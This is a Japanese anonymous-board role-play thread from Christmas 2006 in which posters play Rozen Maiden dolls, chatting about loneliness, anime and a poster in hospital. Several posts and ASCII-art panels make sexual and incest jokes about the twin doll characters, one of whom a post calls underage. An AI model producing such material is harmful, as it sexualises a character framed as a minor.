翠星石は蒼星石が傍に居てくれるだけで
素敵なクリスマスになるですぅ

219 :翠星石:2006/12/24(日) 23:34:09
何しろ蒼星石にあんなことやこんなこと・・・ハッ、何でもないですぅ

220 :翠星石:2006/12/24(日) 23:35:36
翠星石は蒼星石とジュンとケーキと温かいターキーだけあれば幸せですぅ

221 :翠星石:2006/12/24(日) 23:49:58
でも現実は違うですぅ…
蒼星石はジャンクになって遠くに旅立ってしまったですぅ…
チビ人間は媒介のパワーバランスを考えずに、真紅とだけイチャイチャしているですぅ…
おじじが借金に追われているせいで、ターキーを買う金もねーですぅ…
お父様、翠星石は何のために生まれてきたですか?
泣いてなんかいねーですぅ…
目にゴミが入っただけですぅ…

222 :翠星石になりきれ:2006/12/24(日) 23:51:41
>>213
ありがとーですぅ
おかげで少し元気がでた気がするですぅ

223 :翠星石:2006/12/24(日) 23:56:24
>>221
あんまり悩み続けてるとダークサイドに堕ちるですよ

224 :翠星石:2006/12/25(月) 00:00:01
\(*`∧´)/クリスマスのバカやろうですぅ

225 :翠星石になりきれ:2006/12/25(月) 00:01:33
バカやろーー!!ですぅ

226 :翠星石:2006/12/25(月) 00:05:18
蒼星石どこに行ったですかー?

227 :翠星石になりきれ:2006/12/25(月) 00:12:01
もう寝ちまったんじゃないですかぁ?
さてそろそろフロに入りますかね

228 :翠星石:2006/12/25(月) 00:12:20
クリスマスなんか・・・クリスマスなんかぁ・・・

229 :翠星石:2006/12/25(月) 00:13:03
一人ぼっちになるですぅ....

230 :蒼星石:2006/12/25(月) 00:29:57
翠星石、また泣いてるの?

231 :翠星石:2006/12/25(月) 00:34:49
もうクリスマスだというのに創聖のアクエリオンぶっ通しで観賞してるですぅ
合体!ゴーアクエリオンですぅ!

今頃気になるあの子も合体してるんですよね

232 :翠星石:2006/12/25(月) 00:36:00
>>230
泣いてなんかいねぇーですぅ
ただ、蒼星石とクリスマス過ごしたかっただけですぅ

233 :翠星石:2006/12/25(月) 00:38:55
ううっ・・蒼星石・・

234 :翠星石:2006/12/25(月) 00:47:21
ケータイ大喜利見てるですが、古谷徹ノリノリだったですぅ

235 :翠星石になりきれ:2006/12/25(月) 01:03:10
ふ〜ぅサッパリしたですぅ
まだ起きてる翠星石はいるですか?

236 :翠星石:2006/12/25(月) 01:05:08
うう・・・蒼星石ぃ・・・

237 :翠星石:2006/12/25(月) 01:05:09
いるですよー!

238 :翠星石:2006/12/25(月) 01:06:10
いるですよー
さっき一人淋しくクリスマスケーキをやけ食いしてたですぅ

239 :翠星石:2006/12/25(月) 01:07:13
いるですよー

240 :翠星石:2006/12/25(月) 01:07:31
蒼星石は何をやってやがるですか?

241 :翠星石:2006/12/25(月) 01:08:28
夜中にケーキ食べたら太るですよ


242 :翠星石:2006/12/25(月) 01:12:51
人形は太らないですぅ

243 :翠星石になりきれ:2006/12/25(月) 01:13:49
こんな時間なのに
結構起きてる翠星石が多いですね〜

244 :翠星石:2006/12/25(月) 01:20:58
翠星石は眠れない上に寂しいですから

245 :翠星石:2006/12/25(月) 01:30:04
悲しいですぅ

246 :翠星石:2006/12/25(月) 01:42:10
も〜ぅ...ムカつくですぅ
せっかく翠星石が一緒にクリスマスを
過ごしてやろうと思ってたのに蒼星石が逃げたですぅ

247 :翠星石:2006/12/25(月) 01:44:49
この中にやたら蒼星石にお熱な翠星石がいるですね(ニヤニヤ)

248 :JUN:2006/12/25(月) 01:49:13
ぼ、僕と・・・!

249 :翠星石:2006/12/25(月) 01:52:59
>>248
言いかけたら最後まで言えですぅ

250 :JUM:2006/12/25(月) 01:54:29
愛してるよ

251 :JUN:2006/12/25(月) 01:54:34
僕と一緒になってくれぇ〜!!!

252 :翠星石:2006/12/25(月) 01:55:25
ムキー!アクセス規制食らって家から書き込めないですぅ!

253 :翠星石:2006/12/25(月) 01:56:35
>>250-251
ととと...突然何言ってやがるですか?
嘘に決まってるですぅ

254 :JUN:2006/12/25(月) 01:58:10
JUMなんかほっといてくれ。俺はお前が好きだーーー!!

255 ::2006/12/25(月) 02:00:08
この人痴漢ですぅ
    ↓

256 :蒼星石:2006/12/25(月) 02:00:45
僕も翠星石のことが・・
い、いや
なんでもないよ・・

257 :翠星石:2006/12/25(月) 02:00:56
ギャーーーーー!!

258 :翠星石になりきれ:2006/12/25(月) 02:02:21
蒼星石が痴漢?
ありえねぇーですぅ

259 :水銀燈:2006/12/25(月) 02:03:38
何この韓流ドラマな流れ…
別に羨ましくなんかないわよぉ?

260 :翠星石:2006/12/25(月) 02:03:44
蒼星石どこに行ってたですか?

261 :翠星石:2006/12/25(月) 02:03:45
蒼星石は女の子ですから、痴漢なんて無理ですぅ

262 :雛苺:2006/12/25(月) 02:04:33
あなたがちゅきだから〜なのーー!!

263 :翠星石:2006/12/25(月) 02:05:34
何か愛の告白が飛び交ってるですぅ

スレの気温が急上昇してるですよ・・・

264 :翠星石:2006/12/25(月) 02:06:43
聖夜の奇跡ですぅ

265 :翠星石:2006/12/25(月) 02:10:19
>262
チャン・ドンゴンなチビ苺ですねー。

266 :翠星石:2006/12/25(月) 02:15:31
ぅ〜ん....蒼星石...まーた逃げたですぅ

267 :翠星石になりきれ:2006/12/25(月) 02:17:10
蒼星石と何するつもりだったんですかぁ?

268 :翠星石:2006/12/25(月) 02:20:51
翠星石はただ、蒼星石と一緒に
クリスマスを過ごそうと思ってただけですぅ

269 :翠星石:2006/12/25(月) 02:21:54
蒼星石にフラれたですか?

270 :翠星石:2006/12/25(月) 02:21:54
まだクリスマスは22時間あるですぅ

271 :水銀燈:2006/12/25(月) 02:22:26
>268
本当にそれだけぇ?

272 :翠星石:2006/12/25(月) 02:24:42
>>271
(`-´メ)ホントにそれだけですぅ

273 :名無しになりきれ:2006/12/25(月) 02:27:01
                              / ̄ ̄ ヽ,
           喧嘩をやめゅてぇ〜♪    / 丶 /   ',
                         ノ//, {゚}  /¨`ヽ {゚} ,ミヽ
 ふたりをとゅめてぇ〜♪        / く l   ヽ._.イl    , ゝ \
  .ni 7                  / /⌒ リ   ヘ_/ノ   ' ⌒\ \
l^l | | l ,/)                (   ̄ ̄⌒          ⌒ ̄ _)
', U ! レ' /   / ̄ ̄ ヽ,       ` ̄ ̄`ヽ           /´ ̄
/    〈   /        ',        .n   .|   ・    ・   |
     ヽっ{゚}  /¨`ヽ {゚},       l^l.| | /)ノ           |
  /´ ̄ ̄ .l   ヽ._.イl  ',      | U レ'//)           ノ
/  ィ-r--ノ   ヘ_/ノ   ',    ノ    /          ∠_
   ,/              ヽ rニ     |  f\      ノ     ̄`丶.
  丿'               ヽ、  `ヽ   l |  ヽ__ノー─-- 、_   )
. !/                  ヽ、 |   | |           /  /
/                      !jl   |ノ          ,'  /
 .l                      l    |          |   ,'
 .|  ・                  丶   ヽ         |  /
 !                 ア!、,  |   |        ,ノ 〈
./            ・   ./'  (  ヽ_____ノ        ヽ.__ \
                 /   ヽ._>              \__)


274 :翠星石になりきれ:2006/12/25(月) 02:28:24
>>273
どっか行けですぅ

275 :翠星石:2006/12/25(月) 02:29:34
>>273
喧嘩なんてしてねぇーですぅ

276 :頑張れ:2006/12/25(月) 02:40:54
r ̄ ̄ ̄ ̄ヽ
| 試 そ あ |
| 合 こ き |
| 終 で ら |
| 了  め |  _
| だ  た | 谷w)
| よ  ら > t_ノ
ヽ____/ // ヽ
      / i⌒/ i
  rニ7 J-" ノ |
  |/=j (` ̄  |
  r" ┘  i ̄ ̄ ̄/
 /4 ( i  `{  /
`/__彡{|  `i  }
(  ミil、  i ノ
じ二ニLっ)  ど_j


277 :蒼星石:2006/12/25(月) 02:47:16
翠星石、もうこんな時間だし
早く寝た方が良いよ

278 :翠星石:2006/12/25(月) 02:48:20
>>276
誰が諦めるですか?

279 :翠星石:2006/12/25(月) 02:49:28
蒼星石やっと捕まえたですぅ

280 :翠星石:2006/12/25(月) 02:51:01
>>277
蒼星石...さぁ寝るですよ

281 :翠星石:2006/12/25(月) 02:51:11
さぁ、逃げないように縛るですぅ

282 :翠星石:2006/12/25(月) 02:52:06
もう逃がさないですよ

283 :蒼星石:2006/12/25(月) 02:53:08
翠星石・・
は、放してよ・・

284 :蒼星石:2006/12/25(月) 02:53:58
たっちゃった///

285 :翠星石になりきれ:2006/12/25(月) 02:54:02
縛るのはやりすぎじゃないですかぁ

286 :翠星石:2006/12/25(月) 02:54:53
蒼星石
逃げちゃダメですぅ

287 :翠星石になりきれ:2006/12/25(月) 02:55:49
>>284
お、お前
本当に蒼星石ですかぁ・・?

288 :翠星石:2006/12/25(月) 03:09:09
どいつもこいつも盛りやがってるですねぇ
クリスマスはセクロスの日というのは、あながち嘘でもないですね

289 :翠星石:2006/12/25(月) 03:10:15
恋人なんて年がら年中合体してやがるですぅ

290 :翠星石:2006/12/25(月) 03:13:36
でもやりまくりは駄目ですよすぐにマンネリ化するですぅ

291 :蒼星石:2006/12/25(月) 03:17:29
翠星石、そういう話題は
あまりよくないんじゃ・・・

292 :真紅:2006/12/25(月) 03:20:23
本人がジュンとマンネリ化してるからかしらね

293 :翠星石:2006/12/25(月) 03:21:17
翠星石もセクロスやったですよぉ

ファミコンソフトのセクロスですけど・・・

294 :翠星石:2006/12/25(月) 03:22:58
30代のおおいインターネッツですか?

295 :翠星石になりきれ:2006/12/25(月) 03:25:11
翠星石はまだ未成年ですよ〜
だからこういう話題には
あまりついていけねぇですぅ

296 :翠星石:2006/12/25(月) 03:26:05
翠星石はまだ乙女ですぅ

297 :翠星石:2006/12/25(月) 03:27:39
エロスはほどほどに、ですねぇ

298 :翠星石:2006/12/25(月) 03:29:12
ここに本物の乙女がいるなんて信じられんですぅ

299 :翠星石:2006/12/25(月) 03:31:23
↓300getおめでとぅですぅ

300 :雪華綺晶:2006/12/25(月) 03:33:21
では300は貰います・・・・

301 :翠星石になりきれ:2006/12/25(月) 03:37:09
それじゃあ翠星石は
そろそろ寝るですよ
おやすみなさーいですぅ・・

302 :雛苺:2006/12/25(月) 03:44:09
>>300
なんかこの人こわいの・・・ よくわからないけど近寄っちゃいけない気がするのよ

303 :翠星石:2006/12/25(月) 03:50:01
早く寝ないとサンタがこねぇーですよ

304 :雪華綺晶:2006/12/25(月) 03:50:15
>>302
どうしたのですか、お姉様……(おいしそう……)

305 :雛苺:2006/12/25(月) 03:55:29
ガクガクブルブル・・・

306 :翠星石:2006/12/25(月) 07:16:45
起きるですよー!

307 :JUM:2006/12/25(月) 07:55:25
ムクリ…パタリ…

308 :翠星石:2006/12/25(月) 08:40:25
JUNは寝てるですか?
じゃあ、ここで着替えるですね

309 :翠星石:2006/12/25(月) 12:05:04
お昼ですぅ

310 :翠星石:2006/12/25(月) 12:08:57
そうねぇ

311 :翠星石:2006/12/25(月) 12:15:24
スャスャ

312 :翠星石:2006/12/25(月) 12:44:34
お昼ねですか?メリークリスマスですぅ!

313 :翠星石:2006/12/25(月) 13:15:41
プレゼントは私ですぅ!

314 :翠星石:2006/12/25(月) 13:19:48
ごめん…受け取れないですぅ

315 :翠星石になりきれ:2006/12/25(月) 14:00:16
ん〜・・、昨日夜更かししたから
こんな時間に起きちまったですぅ・・
とりあえずオメーらおはようですよ

316 :翠星石:2006/12/25(月) 14:29:22
おはよう?なんたる怠慢ですか

317 :翠星石:2006/12/25(月) 14:33:20
あはははははははは!

318 :翠星石:2006/12/25(月) 14:35:58
夜中からずっと起きてたですぅ

319 :翠星石:2006/12/25(月) 14:37:26
ちょっとは体に気を使うですよ
べ、べつに心配してるわけじゃねーです

320 :翠星石:2006/12/25(月) 15:08:02
これはいいツンデレですねぇ

321 :翠星石:2006/12/25(月) 15:10:15
にょほほ〜w

322 :翠星石:2006/12/25(月) 15:54:59
まばたきって本当にいらない機能ですよね
一回一回はコンマがつくぐらい短くとも、例えば20分強のアニメを見ている間にするまばたきを
全部合せてみれば30秒は軽いですぅ
勿体無い野郎ですぅ、あれ?

323 :蒼星石:2006/12/25(月) 16:10:14
でも目の筋肉も使わないと君のきれいな二重も一重になっちゃうよ
だから二重の人はパチパチじゃなくてパッチリまばたきするんだよ

324 :翠星石:2006/12/25(月) 16:23:37
き、きれいだなんて…褒めたってなんにも出ねーですよ!

325 :翠星石:2006/12/25(月) 16:28:57
オーベルネタ多すぎです

326 :翠星石:2006/12/25(月) 16:36:19
そろそろ飯でも食うです

327 :翠星石:2006/12/25(月) 16:56:39
確かにどこのローゼンスレに行ってもオーベルの話ばかりですね
アニメ2のローゼンスレも、わざわざオーベルスレを立ててネタバレはそっちでって決まったですのに、
オーベルのキャプチャだらけだったりするですぅ
見てない人にとっては脅威ですね


328 :翠星石:2006/12/25(月) 17:02:58
>>308の翠星石は露出狂ですぅ
お前は翠星石ファンを敵に回したですぅ
恥を知りやがれですぅ

329 :蒼星石:2006/12/25(月) 17:13:36
またまたジュン君に見てほしいくせに意地はっちゃって

330 :翠星石:2006/12/25(月) 17:17:20
まだ指輪のキスもしてないのにいきなり裸だなんて、そんなの、だめなのです!
ものごとには順番というものがあるのですーーーっ!

331 :蒼星石:2006/12/25(月) 17:26:16
キスならしたじゃない

332 :翠星石:2006/12/25(月) 17:29:20
蒼星石とキスするですぅ

333 :翠星石:2006/12/25(月) 17:36:38
さっきたべたでしょ

334 :翠星石:2006/12/25(月) 19:05:25
蒼星石を食べたですか?ブルブル・・・
翠星石は恐ろしい子ですぅ・・・震えが止まらんですよ
雪華綺晶も真っ青のスプラッタですぅ

335 :翠星石:2006/12/25(月) 20:31:34
私、翠星石さん
今あなたの後ろにいるですぅ

336 :翠星石:2006/12/25(月) 22:12:04
誰もいねーですぅ

337 :翠星石:2006/12/25(月) 22:16:22
いるですよ

338 :翠星石:2006/12/25(月) 22:17:30
ここにもスタンド使いがいたですね

339 :翠星石:2006/12/25(月) 22:18:36
そして時はいつか動き出すです

340 :翠星石:2006/12/25(月) 22:21:31
あまりオーベルネタを持ってくると、流れが止まる危険があるですよ

341 :翠星石:2006/12/25(月) 22:22:31
大丈夫ですぅ
翠星石は思慮深いですから

342 :金糸雀:2006/12/25(月) 22:37:25
翠星石はカナブンかしらー

343 :翠星石:2006/12/25(月) 22:38:32
誰でしたっけ…

344 :金糸雀:2006/12/25(月) 22:40:21
お約束かしらー

345 :翠星石:2006/12/25(月) 23:04:43
夜は眠りの時間ですぅ
更かしてないでとっととベッドにきやがれです

346 :雛苺:2006/12/25(月) 23:17:47
>>345
うぃー

347 :雛苺:2006/12/25(月) 23:23:18
翠星石は俺の嫁になったのー

348 :翠星石:2006/12/25(月) 23:54:44
>>347
なーに言ってるですかぁ?
おめぇーの嫁になんかならねぇーですぅ

349 :雛苺:2006/12/25(月) 23:57:32
>>348
この流れはやめにするのー
このまま行くと変な流れになってトゥモェが絡んでぐちゃぐちゃな流れになりそーなのー


350 :翠星石:2006/12/26(火) 00:19:23
最初っからしなけりゃいいんですぅ


351 :翠星石:2006/12/26(火) 00:48:49
起きてる翠星石はいるですか?

352 :翠星石:2006/12/26(火) 00:49:59
なんとか

353 :翠星石:2006/12/26(火) 00:51:24
翠星石はお昼寝したから寝れねぇーですぅ

354 :翠星石:2006/12/26(火) 00:52:22
だらしない奴ですぅ


355 :翠星石:2006/12/26(火) 02:28:43
フヒヒ、ヒック、ぅい〜・・・・ォ゙エェェェェェエッ、ゲプッ

356 :JUN:2006/12/26(火) 03:32:59
飲み過ぎかな…

357 :翠星石:2006/12/26(火) 07:10:08
朝ですぅ!起きやがれですぅ!

元気な朝はコイケヤのスコーンから!

358 :名無しになりきれ:2006/12/26(火) 09:32:29
元気な朝は翠星石と蒼星石のセクロスから!!
さぁ蒼星石、一つになって幸せを噛締めるですよ〜!

359 :蒼星石:2006/12/26(火) 09:39:56
ああ…翠星石、僕は嬉しいよ…
けど翠星石、名前入れ忘れてるよ…?

360 :翠星石:2006/12/26(火) 11:04:40
そうみたいですぅ。
名前を入れ忘れるなんて一生の不覚ですぅ・・・

361 :翠星石:2006/12/26(火) 11:57:00
近親相姦あらため近親蒼姦ですねぇ
でも青姦みたいでちょっと変な響きですぅ

362 :翠星石:2006/12/26(火) 12:19:30
酷いネタですぅ

363 :翠星石:2006/12/26(火) 16:21:08
ムニャ・・・生まれたですよ、ジュンと翠星石の赤ちゃん・・・

364 :翠星石:2006/12/26(火) 16:33:16
いい夢見てるですねー

365 :翠星石:2006/12/26(火) 16:59:45
tstですぅ

366 :翠星石:2006/12/26(火) 17:00:23
書けた!
やっと規制解除されたですぅ(涙)

367 :翠星石:2006/12/26(火) 17:03:41
巻き込まれてたですか?
解かれてよかったですね

368 :翠星石:2006/12/26(火) 17:30:12
全鯖規制はさすがに泣けたですぅ
荒らしの巻き添えは勘弁ですぅ
今月何回目かわからんですよ・・・

369 :翠星石:2006/12/26(火) 17:38:59
真っ当な者が裁かれるだなんて、ちくしょうなんて時代ですぅ

370 :翠星石:2006/12/26(火) 21:40:03
冬休みに休めないヤツは可哀想ですぅ

371 :翠星石:2006/12/26(火) 21:41:59
翠星石はやすむですよ
いっぱいいっぱい休むですぅ

372 :翠星石:2006/12/26(火) 21:54:26
有給使いてーです

年末年始に使って同僚から非難バリバリですぅ

373 :翠星石:2006/12/26(火) 22:00:51
羨ましいです

374 :翠星石:2006/12/26(火) 22:03:45
明日は大掃除ですぅ

375 :翠星石:2006/12/26(火) 22:30:32
手伝ってやるですよ
モニタからウニューって這いずり出て

376 :翠星石:2006/12/26(火) 23:34:22
今日はもうみんな寝たみたいですね、いい心がけです

377 :雛苺:2006/12/26(火) 23:38:08
ぅょーぃ

378 :翠星石:2006/12/26(火) 23:40:39
ジュ、ジュン、だめですぅ!チビ苺に聞こえちゃうですっ、ああっ!

379 :翠星石:2006/12/26(火) 23:40:50
まだ起きてたですか!このおバカ苺!

380 :雛苺:2006/12/26(火) 23:42:23
めめめめめ

381 :雛苺:2006/12/26(火) 23:45:04
>>375
わぁあ・・・うにゅーだ

382 :翠星石:2006/12/26(火) 23:47:55
おめーに食わせるうにゅーはねぇーです

383 :翠星石:2006/12/26(火) 23:49:21
いいえ、それはトムです

384 :翠星石:2006/12/26(火) 23:53:20
明日も雨降るのでしょうか?

385 :翠星石:2006/12/26(火) 23:55:23
こっちは降ってなかったですぅ
雪が降るのも遅いです

386 :じじい:2006/12/26(火) 23:55:26
傘持ってけ つ【10本】

387 :翠星石:2006/12/26(火) 23:56:33
ホワイト大晦日になって日本全国パニックになりやがれ!ですぅ

388 :翠星石:2006/12/27(水) 00:04:07
新しい今日ですよ

389 :翠星石:2006/12/27(水) 00:06:41
みっともないこというなですぅ
誇り高いローゼンメイデンのドールは人間の不幸を願う存在じゃねーですぅ
お父様もそう仰っていたですぅ

390 :翠星石:2006/12/27(水) 00:11:07
他人を呪わば穴ふたつですぅ
いやらしいですぅ

391 :真紅:2006/12/27(水) 00:20:51
翠星石...そのピアノ線は何に使うのかしら

392 :翠星石:2006/12/27(水) 00:39:58
来年も箱根駅伝は病院で見ることになりそうですぅ。
早く治りやがれですぅ。

393 :水銀燈:2006/12/27(水) 00:52:13
入院の辛さは分かるわぁ
担当ナースが若ければいいけどー
主任クラスとかぁ、最悪婦長クラスが担当になると鬱になるわぁ

>>392翠星石(可愛い妹)
どんな病気治療で頑張っているか分からないけどぉ
唄を歌ってくれたら私の命使っていいわよ・・・
でも窓は閉めておきなさぁーい


394 :名無しになりきれ:2006/12/27(水) 00:57:31
>>394
次の手術待ちだから、担当は特にいやがらないですぅ。入院生活に慣れたから辛くはないですぅ。

可愛い妹とか、い、言うなですぅ…。

窓?
寒くて窓なんか開けない、というか、寒すぎて非力な私には開けられないですぅ。

395 :水銀燈:2006/12/27(水) 01:02:22
あらぁ、窓が開いてないと私が入れないじゃなぁい クスクス

396 :翠星石:2006/12/27(水) 01:09:37
>>395
さっきはコテ入れるの忘れたですぅ。

冗談は顔だけにしろよ、とか言うといいって聞いたですぅ。この氷点下の時期に窓から入りやがるですか。

397 :水銀燈:2006/12/27(水) 01:11:37
>>394
だって可愛い妹なんだもん心配するのはしょうがないでしょぅ
わたしが入院→手術の時は超若いナースが担当になってしまってぇ
こっちも色々気を使ったわぁ
でも自己レスしちゃうほど体力落ちてるのね
乳酸菌採るといいわぁ
朝一で売店行ってヤクルト買いなさぁい!
>寒くて窓なんか開けない、というか、寒すぎて非力な私には開けられないですぅ。
窓開けたら風邪引くわぁ
窓開けて無くても私はアナタの唄を窓の外で聞いているわよ
だからがんばりなさぁい!あいとー!!


398 :水銀燈:2006/12/27(水) 01:16:15
>>395とは別人よー
私は393と397ぁ
今の時間だと深夜勤のナースさんと勤務交代だわぁ


399 :翠星石:2006/12/27(水) 01:19:16
>>397
ヨーグルト食べてるからいいですぅ。食事制限がないのが救いですぅ。これで制限があったら目も当てられないですぅ…。
何だかこっ恥ずかしいからやめろですぅ。
でも、ありがとうですぅ。

よく見たら、コテがないどころか>>394じゃなくて>>393だったですぅ。
体力はむしろ付いたですぅ。単に寝惚けてただけですぅ。
とっとと寝やがれ、ですぅ。
もう寝るです。

400 :真紅:2006/12/27(水) 01:21:46
そんな翠星石に眠材代わりの座薬注入なのだわ

401 :水銀燈:2006/12/27(水) 01:25:59
>>399
鞄持ってきたからゆっくり眠りなさぁぃ!!
おやすみ・・・お大事に・・・

402 :翠星石:2006/12/27(水) 01:26:07
きょうの水銀燈はやさしいですね
悪いもんでも食ったのですか?

403 :翠星石:2006/12/27(水) 01:30:00
悪いもんでも食って優しくなれるなら幾らでも悪いものくうですぅ。

404 :翠星石:2006/12/27(水) 01:30:29
根性入魂棒に「入院中の翠星石がんばれ」って書きましたですよ

405 :翠星石:2006/12/27(水) 01:32:25
入院中の翠星石の回復を祈って「久保田翠寿」を飲むですぅ!

406 :水銀燈:2006/12/27(水) 01:37:34
酒なら付合いたいけどそろそろメグのベッドに入ってまったり眠りたいのよぉぅ

407 :水銀燈:2006/12/27(水) 01:40:11
おやすみなさぁーぃ

408 :翠星石:2006/12/27(水) 01:41:15
おやすみなさいです
また来たかったら来てもいいですよ
べ、べつに来てほしいわけじゃないですぅ

409 :翠星石:2006/12/27(水) 02:01:08
水銀燈・・・しゃーねーですぅ また来てもいいですよ

410 :翠星石:2006/12/27(水) 02:22:03
手術待ちの翠星石、辛いでしょうけど頑張るですよ
きばっていくですアイトーアイトーです

411 :翠星石:2006/12/27(水) 06:45:08
今日も雨ですぅ

412 :翠星石:2006/12/27(水) 06:53:36
本日も〜♪nice day始まる♪ですぅ

413 :翠星石:2006/12/27(水) 07:15:42
おはよーですぅ 今日は晴れてるですぅ

414 :ヒナ:2006/12/27(水) 10:08:50
ヒナ、お外に行くのよ。ジュンにまたお手紙書いたの〜。

415 :翠星石:2006/12/27(水) 10:45:30
寝て起きたらこんなにレスついて驚いたですよ。
というか、こういうレスの返し方でいいのかよくわからないですぅ。

>>400
400ゲトおめですぅ。
眠材なくても…って、坐薬は遠慮するですぅ。

>>404
根性入魂棒で殴打されたら入院延長間違いないので、やめやがれですぅ。

>>405
酒飲みてぇ…ですぅ。病院で飲むわけにいかないので我慢の子ですぅ。

>>410
あいとー!おー!
応援ありがとうですぅ。

レス書いてたら疲れたので、お昼寝ですぅ。

416 :翠星石:2006/12/27(水) 10:54:12
無理すんなですぅ
べっ、別にお前の事なんか気にして(ry

417 :翠星石:2006/12/27(水) 11:41:03
ふっ、素直じゃないですぅ

418 :翠星石:2006/12/27(水) 12:01:50
ハラヘッタですぅ

419 :翠星石:2006/12/27(水) 12:11:34
昼時ですぅ

420 :翠星石:2006/12/27(水) 12:22:25
今日はカツ丼作って食べるですぅ

421 :翠星石:2006/12/27(水) 12:48:10
すこやかに〜のびやかに〜
ノロウィルスをどんどんそだてて〜

422 :翠星石:2006/12/27(水) 12:51:59
ノロで寝込んだジュンをつきっきりで看病すれば、二人の間がより親密になること
間違いなしですぅ

423 :翠星石:2006/12/27(水) 13:11:56
ジュンと翠星石はベストカップルですぅ←ノロケウイルス


なんちゃってです 寒いですよね・・ まだ結ばれてもいないのに

424 :蒼星石:2006/12/27(水) 13:15:40
ごめんね、翠星石・・・
こんな時、僕どんな顔していいか判らない

425 :翠星石:2006/12/27(水) 13:20:37
病院に行ったほうがいいですよ

426 :名無しになりきれ:2006/12/27(水) 14:30:31
1日1票
http://www.37vote.net/anime/1166276039/

427 :真紅:2006/12/27(水) 14:59:21
当然真紅にいれるわよね?

428 :翠星石:2006/12/27(水) 15:41:00
ちょwwwwwwwww

429 :翠星石:2006/12/27(水) 16:31:00
ローゼンのMAD保管庫ってしらないですか?

430 :翠星石:2006/12/27(水) 16:55:39
まあちょっとくらいなら真紅に入れてやっても

431 :翠星石:2006/12/27(水) 18:21:58
今日も蒼星石と一つになるですぅ
さぁ〜蒼星石〜こっちへくるです〜

432 :蒼星石:2006/12/27(水) 18:26:14
もちろんだよ翠星石…
嬉しいよ…とても…

433 :翠星石:2006/12/27(水) 18:32:16
蒼翠合体!
ゴー・・・ご、ごめんなさいですぅ・・・

434 :翠星石:2006/12/27(水) 18:37:51
                       来るです蒼星石
             ┌──┐ ___     二人きりで
             i二ニニ二i二二,'ヽ>    夢の世界へ行くです
 ちょ、ちょっと!!   i´ノノノヽ))ハイ))|l|
      翠星石!!  Wリ;゚ o゚ノリ゚ー゚.iリ|l|
              (|___⊂l介__|)|ヘ
               〈__ ≦ノヽノ`ヘ.≧
               〈_ノミ<二二二>ミ


さあ蒼星石            ,---------------------、
 夢の世界へ行くです    /____[__ i __]____/ ヽ、
  二人きりの         ヽ、::::::::::::::::::::::::::::::::::::::::::::::::::::::ヽ、 ヽ、
   お楽しみの時間ですぅ!! ヽ、:::::::::___ ::::┌--─┐::ヽ、 ヽ、 ゆ、夢の世界って
                     ヽく/',二二ヽ>ニニニ二i ヽ、 ヽ  なんか意味が違うよ!!
                      |l |ノノイハ))ノノノヽ)))  ヽ/     ていうか、不潔だよ!!
                     /|l |リ゚ ヮ゚ノWリ;゚听ノリ::::::/|
                   /::::ノl |_____(つ(つ介」つ/ .ノ
                  ┌─────────.||´./
                  │    [[二二二]]    .|/
                  └─────────´




--------------------------------------------------------------------------------



             Good morning
     ┌──┐
     i二ニニ二i__
 . _∬i´ノノノヽ)))二二ヽ>
 |__∬ Wリ゚ ー゚((ハyヾ‖ト
 ||\.__-⊂)_介_」ト´ヮ`*||トヾ\
 ||\\ 〜'´  ⊂ )ノ´ ̄ `〜\
    \\    _,.-、 _,-、 _,,.-、 _,-、\
      \\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
        ||_________||
        ||              ||


               なに見てんだゴルァ!!
     ┌──┐
     i二ニニ二i__
 . _∬i´ノノノヽ)))二二ヽ>
 |__∬ Wリ゚д゚((ハyヾ‖ト
 ||\.__-⊂)_介_」ト´ヮ`*||トヾ\
 ||\\ 〜'´  ⊂ )ノ´ ̄ `〜\
    \\    _,.-、 _,-、 _,,.-、 _,-、\
      \\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
        ||_________||
        ||              ||

435 :翠星石&蒼星石:2006/12/27(水) 18:50:37
第二ラウンド

 ガタガタ  ガタガタ_______ガタガタ_______ 
   ガタガタ      ガタガタ       ガタガタl 
   /  ガタガタ      ガタガタ   ガタン!!!!!   / ..|
 /ガタガタ     ガタガタ    ガタガタ     /ガタガタ ./|  <すぃせぇせきぃぃぃぃぃいぃいいいい!!!!!
 │ ̄ ̄ガタガタ ̄ ̄ ̄ガタガタ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| ././      一つに…ひとつになろおおおおお!!!!
ガタガタ  ────ガタガタ[ i ]───ガタガタ||/./          
│      [[二二二ガタガタ]] ガタガタ     │/ ガタガタ  <はぁぁぁあああんそぉせぇぇぇぇぇぇせきぃぃぃぃ!!!!
└──ガ タガタ ───ガタガタ──ガタガタ───′         な…なるですううぅ!!一つになるですうううううぅ!

436 :翠星石:2006/12/27(水) 18:52:11
まだ七時ですのに

437 :蒼星石:2006/12/27(水) 18:53:17
それだからいいのさ
その分長い間翠星石と一つになれる…ふふふ

438 :翠星石:2006/12/27(水) 19:54:34
この年でクレヨンしんちゃん見て泣くとは思いもしなかったですぅ

439 :翠星石:2006/12/27(水) 21:39:03
アニメ映画のクレしんは名作ぞろいですぅ

440 :翠星石:2006/12/27(水) 21:40:57
ローゼンメイデンの劇場版はいつできるですか?
きっとそこでは翠星石が主役ですぅ

441 :翠星石:2006/12/27(水) 21:47:13
平和主義の翠星石がいがみ合う国の統治者同士に握手させて平和をもたらした話ですね

442 :翠星石:2006/12/27(水) 22:15:10
もちろん濡れ場もあるですよ
ジュンもスクリーンに釘づけですぅ

443 :翠星石:2006/12/27(水) 22:15:50
い、いやらしいですぅ

444 :JUM:2006/12/27(水) 22:20:19
444はもらったぞ。

445 :名無しになりきれ:2006/12/27(水) 22:21:32
>>444は死にました

446 :翠星石:2006/12/27(水) 22:22:00
別にジュンにならやってもいいですけど・・・その不吉な数字を

447 :翠星石:2006/12/28(木) 00:12:36
ひまですぅ

448 :翠星石:2006/12/28(木) 00:14:09
ひまですね

449 :翠星石:2006/12/28(木) 00:14:44
何か芸をしやがれですぅ

450 :翠星石:2006/12/28(木) 00:17:29
急にそんなこと言われても困っちゃうですぅ

451 :名無しになりきれ:2006/12/28(木) 00:21:44
名無しで登場ですぅ

452 :翠星石:2006/12/28(木) 00:34:14
ああー今日は眠くなんないです
日頃から不健康な生活を送った甲斐があったですぅ


453 :翠星石:2006/12/28(木) 01:26:04
はげちゃいますよ?

454 :JUN:2006/12/28(木) 01:26:47
おまえ・・・夜中まで僕のパソコンかまってないで、はやくベッドにこいよ

455 :翠星石:2006/12/28(木) 01:28:12
芸なんてヲタぐらいしかできねぇですぅ


456 :翠星石:2006/12/28(木) 01:29:26
人形はハゲたりしないですぅ
しないですよね?

457 :翠星石:2006/12/28(木) 01:35:17
